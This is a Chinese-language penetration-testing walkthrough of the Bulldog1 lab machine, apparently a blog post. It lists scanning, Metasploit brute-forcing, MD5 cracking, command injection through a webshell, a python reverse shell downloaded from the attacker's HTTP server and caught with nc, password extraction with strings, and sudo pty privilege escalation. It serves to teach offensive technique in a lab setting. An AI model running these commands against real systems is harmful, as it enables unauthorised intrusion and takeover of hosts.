1.收集信息

netdiscover,是一个二层工具,原理是数据包产生交互即判定主机存活
netdiscover -i eth0 -r 192.168.249.0/24

靶机:

端口扫描
Masscan --rate=100000 -p 0-65535 192.168.249.137 (判断出目标是137)
–rate发包数
–ports指定端口数

查看端口服务
Nmap -T4 -sV -O -p 8080,80,23 192.168.249.137
-sV服务版本
-T4速度(最高为5,推荐用4)
-O系统
-p 指定端口

2.开展渗透

尝试爆破ssh
应用msf
Msfconsole

search ssh login

Use

show options
use aux
show options
set rhosts 192.168.249.137
set rport 23
set user_file /root/user.txt
set pass_file/root/pass.txt
run
没有成功就不放图了

判断网站指纹信息
whatweb http://IP (判断网站指纹信息:版本,所用服务器,)

扫描网站目录
dirb http://IP
扫描网站目录扫描网站目录,默认字典

去旁站找线索

进入到一个webshell窗口,提示需要登陆才能使用,所以对其后台的用户名和密码进行破解,在这网页下找到了一些类似于md5加密的东西,可以解密看看是否是用户名密码或者是否于下面的邮箱组成账户名密码等(方式很多尽量考虑全一些)

md5解密

有解密到一些东西可将解密到的东西放到一个txt文档里用burpsuite组合爆破

找到登录页面暴力破解

刷新后进入webshell,发现一个命令执行窗口,试试是否由命令执行漏洞

成功

3.反弹shell

用python脚本去远程连接弹出shell进行提权(前面已经注意到网页是用到python的,所以此处用py脚本试试)

P=subprocess.call(["/bin/bash","-i"])
建立了1个子进程,传入参数"-i"使bash以交互模式启动,这个时候我们的输入输出都会被重定向到socket
python -m SimpleHTTPServer 80(打开一个简易的HTTP服务,在哪个目录下开启,读或上传的就是那个目录下的文件)
在存放shell.py的目录下开启简易WEB服务

执行命令上传shell,IP后边单”/”默认80端口,若指定别的端口需要写成 “:8080/”

查看是否上传成功

nc -nvlp 1234开启监听
cmd中输入pwd&python shell.py

成功getshell

/etc/issue(查看内核版本(不一定能查到))

被拒绝

查看系统中的用户;需要关注的用户bulldogadmin,django
进到home下去找文件用strings查看程序里的东西,凭经验找密码
注意:此处用cat查看不了,因为他是程序字符串

-a linux里显示隐藏文件

组合一下:SUPERultimatePASSWORDyouCANTget
“超级终极密码你不可能得到”

4.提权

python -c ‘import pty; pty.spawn("/bin/bash")’ 打开终端
被拒绝

sudo python -c ‘import pty; pty.spawn("/bin/bash")’ 尝试用root身份打开shell
输入密码:SUPERultimatePASSWORDyouCANTget

提权成功√

bulldog1——爆破、命令执行、pty提权相关推荐

  1. 渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root

    靶机介绍 下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/ 作者Mansoor R在VulnHub上上传了哈利波特系列的三个 ...

  2. 10-Stapler-可执行文件提权-内核提权-les.sh-linpeas.sh

    10-Stapler 靶机地址:https://www.vulnhub.com/entry/stapler-1,150/ 信息收集 nmap nmap 192.168.75.0/24 -sP ip 1 ...

  3. SaltStack 二修命令注入和提权漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 Salt Project 再次发布补丁,修复命令注入漏洞 (CVE-2020-28243).该漏洞影响 SaltStack Salt ...

  4. 用友远程命令执行漏洞并提权

    用友的命令执行漏洞,print hello 发现可以执行命令 , whami 和id 都查一波权限,发现是root,呵呵,权限这么大,很好搞啊 ps -ef|grep sshd 查一波 发现可以ssh ...

  5. 齐博cms最新SQL注入网站漏洞 可远程执行代码提权

    齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢.开发架构使用的是php语言以及mysq ...

  6. Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权

    目录 权限分类 针对环境 webshell权限 本地用户权限 提权方法 1.windows内核溢出漏洞(如何判断类型和利用) 2.数据库提权 Mysql Mssql oracle redis post ...

  7. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  8. php5.4漏洞解决,php5.4.3的远程代码执行漏洞,提权挺管用

    PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令 用这个提权是不是很方便了? // Exploit Title: PHP ...

  9. Linux 提权总结

    https://cloud.tencent.com/developer/article/1942516 sudo 和 suid 提权 何为suid 可见在权限位置有一个s权限.那么这个s的作用是什么呢 ...

最新文章

  1. CSS清除浮动_清除float浮动
  2. 阿里达摩院百万大奖评选开启!这次人人都能给青年科学家当伯乐
  3. ltrim($str);
  4. PyCharm2017软件安装教程
  5. git status 不能显示中文
  6. vue鼠标右键自定义菜单_vue-右键菜单功能
  7. 详细解读Python 递归函数!
  8. block--内存管理
  9. JAVA springboot ssm b2b2c多用户商城系统源码(三):服务提供与调用
  10. 如何修改influxdb表结构_influxdb基本操作
  11. 如何避免Scrum敏捷开发团队反思会形式化,海星法介绍
  12. 【Postgresql】pg掉电后无法重启
  13. JSP 九大内置对象及作用域(源码刨析,建议收藏)
  14. 学习java 第三天 数据类型以及存储大小取值范围 (one 大白 (●—●))
  15. 【转】mysql createtable errno 121 150 错误 建表错误 外键
  16. java 随机数算法_Java随机数算法原理与实现方法实例详解
  17. 怎样快速熟悉公司产品
  18. VUE连接MQTT即时通讯
  19. 有趣python小程序系列之一
  20. GPRS网络几种数据中心的接入方式

热门文章

  1. vue 输入框限制中英文及数字
  2. 阳光学车隐私政策URL
  3. 4. Java并发编程-管程
  4. 91 q.v4p.co index.php,静觅丨崔庆才的个人站点
  5. Apache Calcite 实现方言转换
  6. 逃出996,追逐新目标!
  7. 2017年5月14日青岛卫计委笔试真题解析---综合类(考生回忆版)
  8. linux怎么进入bios界面,联想怎么进入bios界面,详细教您进入联想电脑怎么进入bios界面...
  9. mysql官网下载最新版升级版本多版本安装教程
  10. 题解 CF186A 【Comparing Strings】